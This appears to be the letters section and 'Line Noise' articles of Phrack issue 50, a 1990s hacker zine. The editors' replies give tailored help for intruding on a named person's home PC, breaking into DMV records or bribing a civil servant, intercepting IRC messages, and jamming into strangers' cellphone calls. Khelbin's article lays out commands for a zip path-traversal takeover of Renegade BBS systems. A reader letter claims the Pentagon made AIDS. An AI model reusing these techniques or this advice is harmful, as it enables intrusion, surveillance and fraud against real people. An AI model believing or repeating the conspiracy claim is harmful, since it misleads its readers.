Intro to Telephony and PBX systems in Phrack#49 was excellent, pulled a=20
lot of things together for me. That's probably the clearest, most=20
concise explanation of the phone system that I've ever read. Hopefully=20
Cavalier will be up for many more articles like that in the future.
respects,
jake
[ Thanks! Hopefully we can continue have more telephony related articles
in the future. It is fast becoming a lost art in today's hacker
community. ]
-----------------------------------------------------------------------------
hey.. a Note To Say, 1-Greetings From IreLand..
2-Thanks A million.. I love Phrack..
3-Where Is The NexT Issue.. Whats up doc..=20
4-do ya have info/schematics on the shit that allows one
to break into cellfone conversation and chat briefly
to callers, as described in winn schwartaus excellent
article on Defcon ][ ?Cellfone
5-Is Phrack on a Mailing List?? if so, Can ya Stick me
On it?
Many ThanKs
NasTy Nigel,
[PhreaK PowEr]
[ 1. Greetings to you too gobshite!
2. Thanks!
3. You're reading it.
4. Not that I was in the room making those calls mentioned
in that article or anything, but... :)
An Oki-900 with CTEK cable hooked to a PC running omnicell tracking
calls. A motorola brick phone in debug mode, hooked to a 25db gain
yagi antenna (on a tripod) pointed out the window. As Omnicell locked
in on interesting calls, the Motorola was tuned to the corresponding
channel, Tx Audio turned on, various humorous interrupts were uttered,
and Tx Audio turned off so the party being "contacted" wouldn't be
thrown off their cell channel by our more powerful broadcast.
Very simple.
5. The mailing list now is so huge that it will only serve to let people
know when issues are going out, special bulletins, etc. Mailing out
a meg to almost 30,000 people causes serious problems to the Internet,
so we decided to make the change. ]
-----------------------------------------------------------------------------
I just wanted to drop a line and say that you guys are doing a great job
with the zine. I just got issue 49 and I'm looking forward to reading it.
I'm sure you've heard of The Works, the bbs with the most text files in the
US. Well, it's finally back online, after six months in the gutter. For the
best text files and the coolest users east of the Mississippi, call us up.
+1 617 262 6444. You can't go wrong with the Works. We want you to call.
[ It's amazing that BBSes like The Works are still around, even with a bit
of down time. What's it been? 10 years? Geez.
You're approaching the longevity of Demon Roach or P-80. ]
-----------------------------------------------------------------------------
I'm doing research on hackers for my LIB 105 class and have come across
some of what I guess is tech speak or jargon. I've noticed that the
letters 'PH' are frequently used to intentionaly mispell the words
phreak, lopht, and in Phrak Magazine. Is there a reason behind all of
these PHunny spellings?
[ Uh, PH as in Phone. From the old Phone "Phreak" subculture of the
late 60's, early 70's.]
-----------------------------------------------------------------------------
I think a great idea for a future article would be how to make a decoder
card for a DSS sattelite reciever with some easy commercial stuff and a
cmos Z-80 I.C. ...
[ If it were that easy, there would be a bigger number of players in the
billion dollar industry of satellite piracy. A key figure in that
closed community once told me that it cost them about $1,000,000 US to
crack each new rev of smart card. (But when you figure that means only
selling 10000 pirate cards at 100 bucks, the cost of doing business
is minimal, compared to the cost of the service provider sending out
new software and cards to each subscriber.) ]
-----------------------------------------------------------------------------
Hi, I am a Primestar installer, I was wondering if you knew anything about
how to stop Primestar from de-authorizing their unused IRD's? I know of 2
installation screens accessable through the password screen using #'s 996 &
114, do you know of any others? I would appreciate any info you might have.
Thanks,
[ And Phrack would appreciate ANY info you have! ANYTHING! EVERYTHING!
As an installer, you probably have some insights into the cards/recievers
that we don't. Write them up! ]
-----------------------------------------------------------------------------
For certain reasons, some people may want to create a new anonymous mail
box. Did they considered to create it in France?
A lot of IPS offer the possibility to create mailboxes to those who have
no computers by using a primitive look-alike telnet system: the French
Minitel. This is convenient because a couple millions of Minitel have
been freely distributed in France during the last ten years. The only
cost is that an overcharge is billed to your phone bill of approx
35cents per minute. But this is perfectly legal and hard to trace back.
Hyperterminal (at least in its french version) emulates the french
minitel.
The only thing is to dial 3615 in France and use one of this server:
ABCNET, ACENET, ADNET, ALTERN,FASTNET,EMAIL...
For example, EMAIL creates an e-mail adresse like:
pseudonym@xmail.org.
The only thing is that you have to know a little bit of French to use
it, but just a little bit. The cost of a call (International and
Minitel overcharge) should not be a problem to some of you.
LeFrenchie
[ This is a good idea. People outside of France don't know much about
Minitel, (Or any videotext systems) since they failed in a big way
here in the states and most other countries. Many old hackers might
remember some of the Minitel Chat systems also accessible over X.25 such
as QSD (208057040540), but without emulation software wouldn't have
ever had access to the real Minitel. ]
-----------------------------------------------------------------------------
Two questions
1 How can I connect to an IRC server though a firewall?
2 How can I intercept messages sent to chanserv and nickserv on Dal.net?
Thank you.
[ 1. Open up ports 6665-6667
2. Set up a hacked IRC server. Get someone important to add it to the
EFNET server hierarchy. Look for PRIVMSG to whomever you want. ]
-----------------------------------------------------------------------------
Hello,
A modem has a light buffer between the copper wires of the
telephone line and the rest of the copper printed circuit ( mother)
board. How ( or does) does a firewall prevent hacks on a system or
is this just a matter of Modern (Mastodon) buffalo hunting: They
go down the same big or small. Specifically , beyond smart self
learning systems can a server realy prevent contamination without
the intervention of beings? My sister a suposed Webmistress says
there are intervening buffers, I still see that between what ever,
there is a very big freaking leap of faith..
Senor Please Elucidate
Richard
[ Uh, if you think the "firewall" is that light buffer between the wires,
then you have missed the point. A firewall in the networking context is
not the same as the metal firewall in your automobile....it is merely
a metaphor that has been adopted as the term d'jour.
Please read: Building Internet Firewalls by Brent Chapman &
Elizabeth Zwicky or Firewalls & Internet Security by Cheswick & Bellovin ]
-----------------------------------------------------------------------------
> Drop us a line on what you think of 49. Comments are encouraged.
I think issue 49 was great, not to mention getting it out on time. I do have
a suggestion though. The past few issues of Phrack have focused mainly on=20
UNIX and not much else. I think UNIX is a great OS, but it would be cool if
occasionally you would print a few articles about other systems. I would=20
write one myself but right now I don't have anything new to contribute.=20
Later,
Tetbrac
[ This has been a request for a long time. Hopefully we'll get some
articles on other operating systems some day. Personally, I'd like
to see VMS, MVS and OS-400. Any takers? ]
-----------------------------------------------------------------------------
I just finished reading issue 48, and congratulate you on some excellent
techinical articles. I have only one (rather insignificant) comment:
within the article #13 on project neptune, it was stated: "[the urgent
pointer] is TCP's way of implementing out of band (OOB) data." Actually,
URG pointers are in band (specification-wise), however most (but not all)
TCP implementations map the URG flag to out of band. While this point is
irrelevant to SYN flooding, I thought I would present it in case anyone who
read the article is interested in pursuing any nuts & bolts transport layer
implementations. Keep up the good work, and keep turning out more of this
kind of technical information.
ammit-thoth
[ Point noted. Thanks! ]
-----------------------------------------------------------------------------
Listen... you've probably been noticing that I've mailed you guys a
couple times asking for help with hacking. Before I have never recieved
any mail back. You have got to please mail me back this time. I found
something on accident that is really out of my league. You guys are the
best I know of that might be able to help me. I really need your help on
this one. I was fucken around on Telnet just typing in numbers in the
Chicago area code. On accident I typed in numbers and I entered a NASA
Packet Switching System ( NPSS). It said it was a government computer
system and to leave right away. Please mail me back for the numbers. I
need your help to get into this system.... I need yer help.
[ Let me guess, you typed the prefix 321 instead of 312 while playing
on Telenet. The systems you'll find on that prefix have been hacked
at for nearly two decades now. Systems on the network were targeted
in the 80's by Germany's Chaos Computer Club, and I personally know
they have been poked at by groups in the US, UK and Australia
starting back in 1981.
What I'm trying to say is, after so many years of people beating on the
same few systems, shouldn't you look for something a bit less stale? ]
-----------------------------------------------------------------------------
Dear phrack,
I want to be added to the list. I was also wondering if you had ay
publications or information on TEMPEST monitoring? Also know as Van Eck
monitoring.
[ We published a Dr. Moeller's paper continuing on Van Eck's work
in Phrack issue 44.
You might also want to check out http://www.thecodex.com
for a self-contained anti-tempest terminal for about 10K. ]
-----------------------------------------------------------------------------
I just read your editorial in Phrack 48 and I feel like giving you my two=
cents
worth. I think you did an excellent critique on the "scene." As a person
who has been watching for a while, and as a person who has been through it,
I found it nice, to say the least, to find others who actually seem to have
their head on straight. This letter was originally much longer, but I
shortened it because I think you get the point.
I started programming computers in 1983 at the age of 6. I was running
DOS 2.0 and I had a blazing fast 1200 baud modem. At the time, I had
no mentors, no teachers, no friends that could teach me how to use that
incredible machine. The books of the time were cryptic, especially for an
age where most children could not read, much less program. But I did my=
best.
Ten years later, I was still on my own.
I didn't get ahold of a copy of Phrack until 1991. I thought it was really
cool that people like me would get together and exchange infomation, talk
computers, etc.
In '94, I got into viruses and prolly was one of the better independant
(i.e. not in a group) writers. It was about that time I got onto IRC.
Most of the time I would hang out in #virus, but every now and then I
would pop into #hack. I never stayed...I couldn't stand the arrogance.
Shortly before I went to school, I was in competition for control of a
new freenet versus a local hacker group. A month after I went to college,
that group got busted. I got lucky.
Earlier this year, I went on Good Morning America to talk about viruses.
Looking back, it is prolly the single dumbest thing I have done in my
whole life.
As much as I wanted to, I've never been to a 2600 meeting, never been to
a Con. Never really had any hacker friends. It's always been just me.
I'm sure I know less about breaking into computers than the guy who has
been doing it for a week but has access to tons of partners. But I still
consider myself a hacker. My interest has been one of learning about the
system. I've been learning longer than most. I rarely break into
a system. I have access to unix systems, and even a VAX. I don't want
the latest hacking tools. I write my own, with my theories. I don't
need much else. But I've never had anyone to share it with. But I think I
realize that the past is the past, and I won't ever get to attend the old
cons or sit on conference calls, as much as I'd love to. I won't bother
with the latest cons because I can get the same stuff at a college party.
Well, that is about it. I apologize if it is poorly written. Bad english
skills :) I hate writing these because I grow tired of getting slammed
by some arrogant asshole. Thats prolly why I have been doing this alone
for 13 years. After your editorial, I wonder how many people will stop
showing up at the cons...I hate the isolation, but I would never want to
be a part of a "scene" which has turned from mature goals to juvenile
ones. Just my thoughts...
Evil Avatar
[ Actually, I have more respect for the people who continue to stay in the
fringes, learning on their own rather than scurrying for attention
in the media and in the community. (Yes, like me.)
To be fair though, don't sell yourself short by avoiding Cons if you
really want to check them out. Despite all the ranting I did in that
editorial, I still have many friends in the community and enjoy
meeting new ones at conferences. Not everyone thinks it is cool
to trash a hotel, or to try to out "elite" one another. Unfortunately,
the loudest and most visible people at such events tend to be the
most juvenile. If you find this happening, do what I do: get the
hell out of the conference area and find a convenient bar. The older
hackers will eventually find you there, and you can all drink in peace
and actually talk unmolested. ]
-----------------------------------------------------------------------------
Dear Phrack --
Been a reader since the 80s, and I'm one of the originals... Would like
to submit a poem that I wrote that details the experience of a hacker
who left the scene for several years -- Coming back to find it in utter
Dissaray... Definitely not the way he left it... Well -- You guys will
let me know what you think
"Where Have All The Hackers Gone"?
----------------------------------
Original Poetry by: Jump'n Jack Flash -916-
On a cold night in the dead of winter a soul stumbles into #hack and asks:
'Where have all the Hackers Gone?'
Immediately the group recognizes him as one of the originals.
'Help us change our grades!' a voice calls out from the huddled masses.
'Help me hack root on a NYNEX system!' another voice asks.
The soul clutches his bowed head and covers his ears, trying to remember
back to before he involuntarily left the scene a few years ago.
'The only thing that kept me sane while I was imprisioned was the
thought of seeing my friends and fellow hackers, now I demand you tell
me Where Have All The Hackers Gone?' the soul begs the crowd of jubulent
newbies.
Silence is the only answer he receives,
For there are no real hackers here.
Then a voice speaks up and says,
'They're gone! You're the first we've seen!'
The soul asks,
'What do you mean?'
And Silence is the only answer he receives,
For there are now real hackers here.
And like a wall crumbling down it comes to him and he falls to his knees,
like hunting for human life after a Nuclear war he stumbles out of the room,
And he hurries to the place where only the Elite could go just a few years=
ago,
But when he arrives he is shocked and amazed,
There are no hackers here on this dark winter day.
And he stumbles into traffic,
feeling the snow crunch beneath his feet,
and he shouts into the night for the elite,
'Where Have All The Hackers Gone?'
And Silence is the only answer he receives,
For there are no real hackers here.
[ Nice poem man...thanks!
Where did the hackers go? They grew up and got real jobs... ]
-----------------------------------------------------------------------------
I'd love to say that I'll miss Erik, but after that obnoxious, immature
rant, all I can say is good riddance. Now maybe Phrack will be useful
again.
[ Well, I guess not everyone agrees with me, which is a good thing.
But, uh, I'm not gone man...just narrowing my duties...so fuck you. :) ]
-----------------------------------------------------------------------------
'' WARNING ''
COVERT EXTERMINATION OF THE POPULATION. !!!=20
THE UNITED NATIONS=3DNEW WORLD ORDER HAS TURNED AMERICA INTO A
EXTERMINATION CAMP. THE PENTAGON GERM '' AIDS '' WAS CREATED
AT A GERM WARFARE LAB AT FT, DETRICK, MD. AIDS AND CANCER CELLS
ARE BEING INJECTED INTO PEOPLE UNKNOWING UNDER THE GUISE OF VACCINES
AND SOME PHARMACEUTICALS.
SOMETIMES THE TRUTH IS SO UGLY WE DO NOT WANT TO BELIEVE IT. !!
AND IF WE DO NOTHING, THEN WE DESERVE IT. !
BELIEVE IT OR NOT. DISTRIBUTE WIDELY.
'' HACK OR CRACK THE UNITED NATIONS =3D NEW WORLD ORDER. ''
LONG LIVE THE POWER THROUGH RESISTANCE.'' !!!
SONS OF LIBERTY MILITIA
312 S. WYOMISSING, AVE.
SHILLINGTON, PA. 19607 U.S.A.
610-775-0497 GERONIMO@WEBTV.NET
[ It's about time we got some mail from some kind of Militia-types!
Let's all arm up to prepare for the revolution! A healthy dose
of AK-47's and PGP will save us all from the ZOG hordes when the
balloon goes up.
Hey, have you guys read the Turner Diaries by Andrew Macdonald?
Get it from Barricade Books, 150 5th Ave, NY, NY 10011.
Ahem. ]
-----------------------------------------------------------------------------
i want a credit card generator
[I want a pony]
-----------------------------------------------------------------------------
Hello !!!
I just read in P48-02 the letter of the russian subscriber who tells you=20
(the editors) the story about the FAPSI and they plan to order all=20
ISPs to provide for a possibilty for them to read all the mail.
In the editor's note below that you say that you fear your country (I assume
it's the USA) is also heading towards that goal.=20
Well, I live in Germany, and it has already happened here. That means,=20
every ISP (and this is not the exact term, as it also includes all sorts
of information providers, ie telephone companies - but excludes=20
private BBSs, I believe) are forced to provide a method that not only
- Allows the government/police to read everything that is written but also
- Without even the ISP noticing it (though I don't know how this would=20
be ensured, technically).
=20
OK, this is not the same as in Russia, as they don't copy ALL the mail and=
=20
news, but only that of persons suspected of a crime strong enough=20
to allow it, ie it's the same thing that's needed to open people's=20
mails. Still, I feel it's certainly a step in the wrong direction.
Note that cryptography is not (yet ?) forbidden in de.
=20
Regards,=20
=20
Thomas=20
[ Germany? Governmental rights violations? Say It isn't so! Should I get=
my
brown shirt out of the closet for my next visit to Berlin? :) ]
-----------------------------------------------------------------------------
Hello, I want to be a hacker and I need some help. I have read
countless reports on UNIX, VMS, and all that other jazz but that still
doesn't help me with my problem.
I want to be able to hack into someone's home PC from my own home. Now,
most PC's aren't capable of doing this but, this person has a
connection on the internet and is also linked to his work in LONDON,
ONTARIO at a place called IAPA. (industrial accident prevention
association) Anyway, he runs WINDOWS 95' and is using NETCOM. Now I
know his password if that does me any good, but how do I go about doing
this?
SHAOULIN
[ When you say "I want to hack his home PC" what do you mean?
Just because he uses NETCOM, that doesn't mean you can find him. He is
probably being assigned a dynamic IP address each time he calls in to the
network. Even so, let's say you can discern his IP address. Even if
a computer is hooked into the Internet, it is only as insecure
as the services it offers to the world.
If your friend is running Windows 95, then you may only be limited
to attacking any SMB-style shared directories or perhaps via FTP.
In either case, if you know this person's password, then you can
probably read/write anything you want to on their system.
Run a port scanner against it and see what you can access, and
plan based on that. ]
-----------------------------------------------------------------------------
This message was sent to you by NaughtyRobot, an Internet spider that
crawls into your server through a tiny hole in the World Wide Web.
=20
NaughtyRobot exploits a security bug in HTTP and has visited your host
system to collect personal, private, and sensitive information.
=20
It has captured your Email and physical addresses, as well as your phone
and credit card numbers. To protect yourself against the misuse of this
information, do the following:
=20
1. alert your server SysOp,
2. contact your local police,
3. disconnect your telephone, and
4. report your credit cards as lost.
=20
Act at once. Remember: only YOU can prevent DATA fires.
=20
This has been a public service announcement from the makers of
NaughtyRobot -- CarJacking its way onto the Information SuperHighway.
[ Funny, my phone isn't ringing, and my credit is still only as screwed up
as it was when I got through with it. ]
-----------------------------------------------------------------------------
Hi
I'm looking for some cellular pheaking information
but is verry hard to find god information
can giveme something to work on??? :-)
[ The best site going is Dr. Who's Radiophone site at:
http://www.l0pht.com/radiophone ]
-----------------------------------------------------------------------------
I just have a question to ask. How would I bypass Surfwatch so that I
can go into web sites that I would like to see?
[ It is very easy to bypass SurfWatch. Stop using Mommy & Daddy's computer
and buy one of your own. ]
-----------------------------------------------------------------------------
i was recently using A-Dial a couple of months ago, and came up with about
10 or 12 different numbers starting at 475-1072. Curious about this, I
called one back, using a mini-terminal. What I expected wasn't this. What
it said is in the file attached to the letter. It says the same thing with
all of the numbers. I could use some info on what the hell this is, because
I never heard of Annex. Thanx.
Data Case
[ What you have connected into is more than likely a kind of terminal
server. From there you can usually enter a system name to connect
directly into the specified system, or enter in "cli" to go into the
command line interpreter where you have more options to choose from
including "help." ]
-----------------------------------------------------------------------------
Do you know where I can find texts on hacking into the California=20
Department of Motor Vehicle Records? My friend's identity was stolen=20
for credit card fraud and the person who did it even went so far as to=20
get a CA driver's license to impersonate her. The worst part is that=20
Visa won't release a copy of the fraudulent person's fake driver's=20
license to my friend, so she can't find out who this person actually is.=20
Do you know of any other ways we can get this person?
Binky
[ Gee, Binky. If VISA is involved and it was credit card fraud, then
is the Secret Service involved too? If so, then why on earth do you
(or your friend) want to get in the middle of it? You'll know soon
enough who the person is when they get charged, or is this just a
Charles Bronson style vigilante thing?
California's DMV (as well as most public records databases in that
state) is kept somewhat restricted to public queries due to the large
number of celebrities living in the state, or otherwise you could just
go buy the information directly from the state.
If you're thinking about pulling a "Mitnick" and breaking into such
a database, then you better know something about IBM mainframes and
know how to defeat RACF. Or be willing to dig around in the trash
until you locate a valid account. Even if you find a valid RACF userid,
you will have 3-5 tries per account to guess a valid password until the
account is locked out (which of course will let them know you were
trying to hack them.)
For an easier solution, you might want to looking in the yellow pages
for a private investigator and have them do a search on Information
America or NIA and get the listing for you, or bribe a civil servant. ]
-----------------------------------------------------------------------------
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
3 of 16
// // /\ // ====
// // //\\ // ====
==== // // \\/ ====
/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====
------------------------------------------------------------------------------
----<>----
=--=--=--=--=--=--=--=
Portable BBS Hacking
by: Khelbin
=--=--=--=--=--=--=--=
This hack basically has little to do with the BBS software itself but
with the archiver which is being used. I've used this technique on a
mock Renegade setup and with pkzip/pkunzip as the archiver. I'm sure
that this same type of technique will be successful on many other BBS
platforms and with other archivers as well. While explaining this, I will
use Renegade and pkzip/pkunzip as my example.
A Renegade setup is most likely vulnerable if it will pkunzip any user
supplied zipfile. This is because Renegade's default command to unzip files
is "pkunzip -do ". The -d flag unzips the file retaining any
directories which were included into the zip file and the -o flag will
automatically overwrite any file.
Suppose the remote system is also setup in a normal Renegade fashion.
Let's use this file tree as an example:
C:\RENEGADE\
C:\RENEGADE\TEMP\
C:\RENEGADE\DATA\
The other subdirectories are unimportant for our discussion. Suppose
that C:\TEMP is where our uploaded file will go for it to be unzipped and
then scanned for viruses. C:\RENEGADE\DATA\ is where the USERS.DAT file
is stored, containing all the users login information.
Wouldn't it be nice if we could put our own USERS.DAT in there instead?
To do this, you must first generate a USERS.DAT file. This is easy enough.
Just download a copy of Renegade which is the same version as the target
machine and then use the user editor to make a "SYSOP" account with the
password "SYSOP" (this should be the default anyway on the USERS.DAT file).
Here's how we prepare the zipfile on our own machine:
C:\>md tmp
C:\>md c:\tmp\ddsdata
C:\>copy c:\renegade\data\users.dat c:\tmp\ddsdata
C:\>cd tmp
C:\TMP>pkzip -pr evil.zip
Now we get out our trusty hex editor and edit evil.zip. Change every
occurrence of "ddsdata" in evil.zip to read "../data" and make sure that the
slash is a forward-slash and not a back-slash. Now when you upload
evil.zip to this particular BBS, it will expand to "../data/users.dat"
and your USERS.DAT file will overwrite their USERS.DAT file since the -od
flag is default on Renegade.
Now you can login as SYSOP with a password SYSOP and do as you please.
You could also overwrite virtually any file on a BBS like this and believe
me, many do have this vulnerability or something very close to it. You are
only limited in how much you can traverse up and down directories by DOS's
maximum file length of 12 (8 plus "." plus 3 = 12). I quickly tried
inserting a few blocks into the zipfile in order to produce a limitless
amount of traversing which but it seemed to corrupt the file for some
reason.
Removing the -o flag is not a fix for this bug. Without the -o flag,
you can "hang" the system in a denial of service attack. By again hex
editing the names of the files within your evil.zip, you can make it have
two files with the same name. When it tries to unzip the second file, it
will prompt locally whether to overwrite the file or not and "hang" the
board. Instead, the -d flag is what should be removed.
This is just an example as I'm sure many other BBS systems do this same
type of uncompressing. I'd also bet that arj, lha, and several others, can
also be hex edited and yield similar results. Either way, it's either take
out the "restore/create directories within archive" option or pay the price.
----<>----
German Hacker "Luzifer" convicted by SevenUp / sec@sec.de
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SYNOPSIS
========
On February 5th, 1997, Wilfried Hafner aka "Luzifer" was sentenced to
three years incarceration - no parole, no probation. I've got the story
for you right from the courtroom in Munich, Germany. This is one of the
first ever cases in which a hacker in Germany actually gets convicted, so
it's particularly interesting. (Although the court and I use the term
"hacking", this is actually a case of unethical electronic fraud.)
LUZIFER
=======
Wilfried Hafner (Luzifer) was born on April 6, 1972, in Breschau Italy.
According to his own circulum vitae, which he quoted in court himself,
he's been a pretty smart guy: He started programming at 8 years,and cracked
about 600 Commodore programs, at 14, got a modem and then started a BBS.
In 1990 he was blueboxing to some overseas partylines to communicate with
others. But he didn't seem to use any other "elite" chat systems like x.25
or IRC, so most people (including myself) didn't know him that well. In
1992 he moved to South Germany to goto school.
WHAT HE DID
===========
Luzifer set up some overseas partylines in the Dominican Republic,
Indonesia, The Philippines, and Israel. Some lines included live chat,
but most were just sex recordings. Then he used a local company PBX (a
Siemens Hicom 200 model), from his homeline, which was only "protected"
by a one digit code, to dialout to his partylines and his girlfriend in
Chile. He also was blueboxing (which the prosecution calls "C5-hacking")
from five lines simultaneously, mostly via China. To trick the partyline
provider and overseas telcos (who are aware of computer-generated calls)
he wrote a little program that would randomize aspects of the calls
(different calling intervals and different durations for the calls).
He got arrested the first time on 03/29/95, but was released again after
13 days. Unfortunately he restarted the phreaking right away. If he'd
had stopped then, he would just have gotten 1 year probation. However, he
was arrested again in January 1996, and has been in prison since.
Here are some numbers (shouts to Harper(tm)'s Index):
- Number of logged single phone connections: 18393
- Profit he makes for 1 min. partyline calls: US$ 0.35 - 0.50
- Total Damage (= lost profit of telco): US$ 1.15 Million
- Money that Luzifer got from the partylines: US$ 254,000
- Paragraph in German Law that covers this fraud: 263a StG
- Duration of all calls, if made sequentially: 140 days
THE TRIAL
=========
This trial was far less spectacular than OJ's. While 7 days had been
scheduled, the trial was over after the second day. The first day went
quite quick: The court didn't have enough judges available (two were present,
but three required), so it had to be postponed after some minutes.
At the second day, both, the prosecution and Luzifers two lawyers, made
a deal and plead guilty for three years prison (but no financial punitive).
In Germany, all sentences over two years cannot be carried out on probation.
But he has been allowed the use of a notebook computer. Rumor has it that
he might be get an "open" execution, meaning that he has to sleep in the
prison at night, but can work or study during the day.
The deal looked like the prosecution dropped all counts (including
the one abusing the PBX in the first place) but two: one for the blueboxing
before getting arrested, and one count for blueboxing afterwards. They don't
treat all 18393 connections as a separate count, but just each start of the
"auto-call-program".
QUOTES
======
Here are some interesting and funny quotes from the trial:
"Just for fun and technical curiosity" - Defendant
"Wouldn't one line be enough for technical experience"? - Judge
"I ordered 21 lines, but just got 5" - Defendant
"Lots of criminal energy" - Prosecutor
"He's obsessed and primarily competing with other hackers" - Lawyer
"A generation of run down computer kids" - Prosecutor
"He may keep the touchtone dialer, but we cannot return his laser fax,
because the company's PBX number is stored in its speedial" - Prosecutor
"Myself and the Telekom have learned a lot" - Prosecutor
"New cables must be installed, new satelites have to be shot into the air"
- Prosecutor about the consequences of used up trunks and intl. lines
"The German Telekom is distributing pornography with big profits" - Lawyer
----<>----
Yet another Lin(s)ux bug!
By: Xarthon
IP_MASQ is a commonly used new method of traffic forwarding which
may be enabled in newer Linux kernel versions. I have been doing some
research into this new feature.
IP_MASQ fails to check to make sure that a packet is in the non
routable range. If you are able to get any packet to its destination, the
header of that packet is rewritten.
Because of the lack of non-routable ip checking, the same tactics
that would be used a gateway machine, may also be used on a machine that
uses ip_masq.
So in conclusion, you are able to spoof as if you are on the
inside network, from the outside. But hey, what can you expect from
Linux?
----<>----
11.22.96
daemon9 and w0zz's adventure into warez-pup land...
*W|ZaRD* u there?
-> *W|ZaRD* yes?
d9
hi w0zz
*W|ZaRD* r u the prez of BREED?
*** |COBRA| invites you to channel #supreme
I am hungry
-> *W|ZaRD* yup
*_e|f_* hi there - you got a minute?
*W|ZaRD* alright.. i got a question for u...
*** d9 (plugHead@onyx.infonexus.com) has joined channel #supreme
*** Topic for #supreme: [SpR] Still in discussion phase! [SpR]
*** #supreme _e|f_ 848703589
*** Users on #supreme: d9 @{Imagine} @BL|ZZaRD @W|ZaRD @|COBRA| @_e|f_
<_e|f_> re d9
*** Mode change "+o d9" on channel #supreme by _e|f_
<|COBRA|> today is going to be a bad day :(
*W|ZaRD* would you be interested in merging with like 4-6 other groups to become 1 group.??
*W|ZaRD* i mean. all the other groups have like 11 sitez and 8-10 suppliers like NGP
*W|ZaRD* and if we merge we could be up there with Prestige, and Razor
<_e|f_:#supreme> hello d9
*W|ZaRD* i mean. all the other groups have like 11 sitez and 8-10 suppliers like NGP
-> *W|ZaRD* hmm
*** Inviting w0zz to channel #supreme
<_e|f_> we got a discussion going on here for big plans for a lot of us "smaller" groups (smaller as
compared to razor, prestige etc) :)
ah
*** Mystic12 (NONE@wheat-53.nb.net) has joined channel #supreme
<_e|f_> this is all still in discussion stages
hahahaha
*** Mode change "+o Mystic12" on channel #supreme by W|ZaRD
<_e|f_:#supreme> but would you be interested in a joint venture between a few of us smaller release groups
to combine into one large release group - to challenge razor and prestige?
w0zz
you've been sucked into warez kiddie conspiracies
join me
where are you?
*** Inviting w0zz to channel #supreme
*** w0zz (wozz@big.wookie.net) has joined channel #supreme
well...
*** Mode change "+o w0zz" on channel #supreme by d9
werd
<_e|f_> re wozz
hi w0zz
hi there
<_e|f_> i can send u a log to flesh out a few more details if you like
i've got mackin' warez
hmm
sure
*w0zz* you recording this for line noise ?
*w0zz* ;)
-> *w0zz* indeed...;)
*w0zz* heh
the thing is, I have all this porn I want to unload...
yah, i got da mackin porn too
but, no good place to distro it...
*** ^DRiFTeR^ (~Drifter@203.30.237.48) has joined channel #supreme
*** Mode change "+o ^DRiFTeR^" on channel #supreme by _e|f_
<_e|f_> hey drifter
I was using this panix account, but all that SYN flooding stopped that cold...
<_e|f_> drifter is muh vp :)
do you even know what BREED is, route?
warez pups?
<_e|f_:#supreme> drifter: d9 and wozz are from breed
<_e|f_:#supreme> blizzard and wizard are from NGP
<^DRiFTeR^:#supreme> k
HAHAHAhahahaha
I am also from NGP
*** Signoff: Mystic12 (Leaving)
so is Mystic12
well, looks like it. just wondered if you knew them at all
w0zz... you get the new shit I send you?
*** Mystic12 (NONE@wheat-53.nb.net) has joined channel #supreme
yah
<_e|f_:#supreme> sorry mystic - didnt see yew there
nope!
*** Mode change "+o Mystic12" on channel #supreme by W|ZaRD
indexed and everything
hahaha
i spanked my monkey for hours
whee
werd.
AAAAAHAHAHahahhahaha WOZZ!
<_e|f_> brb
hmm
#supreme Mystic12 H@ NONE@wheat-53.nb.net (CCINC)
#supreme ^DRiFTeR^ H@ ~Drifter@203.30.237.48 (ReaLMS oF Da NiTe - HrD)
#supreme w0zz H@ wozz@big.wookie.net (w0zz)
#supreme d9 H@ plugHead@onyx.infonexus.com (Built Demon Tough)
#supreme {Imagine} H@ BOB@199.190.110.99 (.:tORn f#E?h:. v1.45 by SLaG)
#supreme BL|ZZaRD H@ blizzard@ip222.tol.primenet.com (hehe)
#supreme W|ZaRD H@ m3ntal@ip201.tol.primenet.com (M3NTaL)
#supreme |COBRA| H@ cobra@slbri3p24.ozemail.com.au (100% ReVpOwEr)
#supreme _e|f_ H@ _e|f_@203.26.197.12 (blah)
werd
*** Mode change "-ooo _e|f_ |COBRA| W|ZaRD" on channel #supreme by d9
*** Mode change "-ooo BL|ZZaRD w0zz ^DRiFTeR^" on channel #supreme by d9
*** Mode change "-o Mystic12" on channel #supreme by d9
hehe
*** Mode change "+o w0zz" on channel #supreme by d9
<_e|f_> sigh
what would the new group name be.. if this happened?
the new name?
hmm. nice takeover
hehe
werd
w0zz, what do you think?
new group name
<_e|f_> d9: ops plz
r00t? guild?
wait
<_e|f_> this is only a temp channel neway d9
guild wuz already used
those are taken...
<_e|f_> so its a waste to do a takeover
i like r00t
oh
yeah
those guys are eleet
yah
I hear r00t has this 10 year old that can break into .mil sites...
*** d9 is now known as daemon9
duod, he's like D.A.R.Y.L.
hehe
yah..
<_e|f_> d9: i take it by this yew aint interested?
<_e|f_> :\
anyway, bak to pr0n.
anywayz.. op me d00d
me too
must have m0re pr0n
*** Mode change "+m" on channel #supreme by daemon9
yes
*** w0zz has left channel #supreme
more pr0n
werd
that rooled
mega-pr0n
porn
hehe
kiddie-pr0n
op me plz
wizard, you are fine the way you are.
*** w0zz is now known as [w0zzz]
*** daemon9 has left channel #supreme
*** daemon9 is now known as r0ute
hahaha
<[w0zzz]> heh
that was fun.
good way to wake up from a nap
----<>----
Large Packet Attacks
(AKA Ping of Death)
---------------------------------
[ Introduction ]
Recently, the Internet has seen a large surge in denial of service
attacks. A denial of service attack in this case is simply an action of some
kind that prevents the normal functionality of the network. It denies service.
This trend began a few months back with TCP SYN flooding and continues with the
"large packet attack". In comparison with SYN flooding, the large packet attack
is a much more simple attack in both concept (explained below) and execution
(the attack can be carried out by anyone with access to a Windows 95 machine).
TCP SYN flooding is more complex in nature and does not exploit a flaw so much
as it exploits an implementation weakness.
The large packet attack is also much more devastating then TCP SYN
flooding. It can quite simply cause a machine to crash, whereas SYN flooding
may just deny access to mail or web services of a machine for the duration of
the attack. For more information on TCP SYN flooding see Phrack 49, article 13.
(NOTE: The large packet attack is somewhat misleadingly referred to as 'Ping of
Death` because it is often delivered as a ping packet. Ping is a program that
is used to test a machine for reachablity to see if it alive and accepting
network requests. Ping also happens to be a convenient way of sending the
large packet over to the target.)
The large packet attack has caused no end of problems to countless
machines across the Internet. Since its discovery, *dozens* of operating
system kernels have been found vulnerable, along with many routers, terminal
servers, X-terminals, printers, etc. Anything with a TCP/IP stack is in fact,
potentially vulnerable. The effects of the attack range from mild to
